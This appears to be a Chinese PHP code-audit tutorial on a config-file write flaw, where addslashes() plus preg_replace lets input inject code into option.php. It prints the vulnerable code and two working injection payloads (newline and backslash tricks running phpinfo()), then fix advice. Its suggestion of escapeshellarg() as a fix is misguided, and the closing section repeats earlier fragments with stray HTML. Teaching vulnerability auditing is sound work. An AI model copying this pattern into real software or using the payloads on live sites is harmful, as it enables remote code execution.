PHP代码审计教学：Challenge 2 - 配置文件写入漏洞分析<\/h1>

漏洞背景<\/h2>
本案例展示了一个典型的配置文件写入漏洞，通过不安全的正则替换操作导致任意代码执行。这种漏洞常见于需要动态更新配置文件的场景中。<\/p>

漏洞代码分析<\/h2>

原始代码<\/h3>

\/\/ index.php
<\/span><\/span><\/span><\/span><?<\/span>php<\/span>
<\/span><\/span>$str =<\/span> addslashes<\/span>($_GET['option'<\/span>]);
<\/span><\/span>$file =<\/span> file_get_contents<\/span>('xxxxx\/option.php'<\/span>);
<\/span><\/span>$file =<\/span> preg_replace<\/span>('|\$option=\'.*?\';|'<\/span>, "<\/span>\$<\/span>option='<\/span>$str<\/span>';"<\/span>, $file);
<\/span><\/span>file_put_contents<\/span>('xxxxx\/option.php'<\/span>, $file);
<\/span><\/span><\/code><\/pre>\/\/ xxxxx\/option.php
<\/span><\/span><\/span><\/span><?<\/span>php<\/span>
<\/span><\/span>$option=<\/span>'test'<\/span>;
<\/span><\/span><\/code><\/pre>代码功能解析<\/h3>

从GET参数option<\/code>获取用户输入<\/li>
使用addslashes()<\/code>对输入进行转义处理<\/li>
读取option.php<\/code>文件内容<\/li>
使用preg_replace()<\/code>进行正则替换，将原配置文件中的$option='...'<\/code>替换为新的值<\/li>
将修改后的内容写回option.php<\/code><\/li>
<\/ol>
漏洞原理<\/h2>
正则表达式分析<\/h3>
正则模式|\$option=\'.*?\';|<\/code>匹配$option='...'<\/code>这样的字符串，其中：<\/p>

.*?<\/code>表示非贪婪匹配任意字符<\/li>
单引号被转义匹配<\/li>
<\/ul>
替换操作的问题<\/h3>
替换字符串是硬编码的"\$option='$str';"<\/code>，其中$str<\/code>是用户可控的输入。虽然使用了addslashes()<\/code>进行转义，但在特定情况下仍可绕过。<\/p>
漏洞利用方法<\/h2>
方法一：利用换行符注入<\/h3>


第一次请求：<\/p>
?option=aaa';%0aphpinfo();\/\/
<\/code><\/pre>

经过addslashes()<\/code>后变为：aaa\';%0aphpinfo();\/\/<\/code><\/li>
替换后文件内容：
<?<\/span>php<\/span>
<\/span><\/span>$option=<\/span>'aaa\';
<\/span><\/span><\/span>phpinfo();\/\/'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

第二次请求：<\/p>
?option=xxx
<\/code><\/pre>

替换aaa\<\/code>为xxx<\/code>，文件变为：
<?<\/span>php<\/span>
<\/span><\/span>$option=<\/span>'xxx'<\/span>;phpinfo<\/span>();\/\/';
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

访问\/xxxxx\/option.php<\/code>执行phpinfo()<\/code><\/p>
<\/li>
<\/ol>
方法二：利用反斜杠转义<\/h3>


请求：<\/p>
?option=aaa\';phpinfo();\/\/
<\/code><\/pre>

经过addslashes()<\/code>后变为：aaa\\\';phpinfo();\/\/<\/code><\/li>
替换后文件内容：
<?<\/span>php<\/span>
<\/span><\/span>$option=<\/span>'aaa\\'<\/span>;phpinfo<\/span>();\/\/';
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

访问\/xxxxx\/option.php<\/code>执行phpinfo()<\/code><\/p>
<\/li>
<\/ol>
漏洞修复建议<\/h2>

严格验证输入<\/strong>：对option<\/code>参数进行严格的白名单验证<\/li>
避免动态代码生成<\/strong>：考虑使用JSON或INI格式的配置文件<\/li>
使用安全函数<\/strong>：如escapeshellarg()<\/code>替代addslashes()<\/code><\/li>
限制文件权限<\/strong>：确保配置文件目录不可直接访问<\/li>
使用完整正则匹配<\/strong>：确保替换不会破坏文件结构<\/li>
<\/ol>
学习要点<\/h2>

addslashes()<\/code>的局限性：不能完全防止代码注入<\/li>
正则替换的安全隐患：动态构建正则替换字符串的危险性<\/li>
配置文件写入的常见漏洞模式<\/li>
换行符(%0a<\/code>)在代码注入中的作用<\/li>
反斜杠转义的特殊处理<\/li>
<\/ol>
扩展思考<\/h2>

如果配置文件使用双引号而非单引号，漏洞利用方式会有何变化？<\/li>
如何设计安全的配置文件更新机制？<\/li>
除了PHP代码注入，这类漏洞还可能导致哪些安全问题？<\/li>
<\/ol>
此案例展示了即使是简单的配置文件更新功能，如果实现不当也可能导致严重的安全问题，强调了输入验证和安全编码的重要性。<\/p>

PHP代码审计教学：Challenge 2 - 配置文件写入漏洞分析<\/h1>

漏洞背景<\/h2> 本案例展示了一个典型的配置文件写入漏洞，通过不安全的正则替换操作导致任意代码执行。这种漏洞常见于需要动态更新配置文件的场景中。<\/p>

漏洞代码分析<\/h2>

漏洞原理<\/h2>

替换操作的问题<\/h3> 替换字符串是硬编码的"\$option='$str';"<\/code>，其中$str<\/code>是用户可控的输入。虽然使用了addslashes()<\/code>进行转义，但在特定情况下仍可绕过。<\/p>

漏洞背景<\/h2>
本案例展示了一个典型的配置文件写入漏洞，通过不安全的正则替换操作导致任意代码执行。这种漏洞常见于需要动态更新配置文件的场景中。<\/p>

替换操作的问题<\/h3>
替换字符串是硬编码的`"\$option='$str';"<\/code>，其中$str<\/code>是用户可控的输入。虽然使用了addslashes()<\/code>进行转义，但在特定情况下仍可绕过。<\/p>`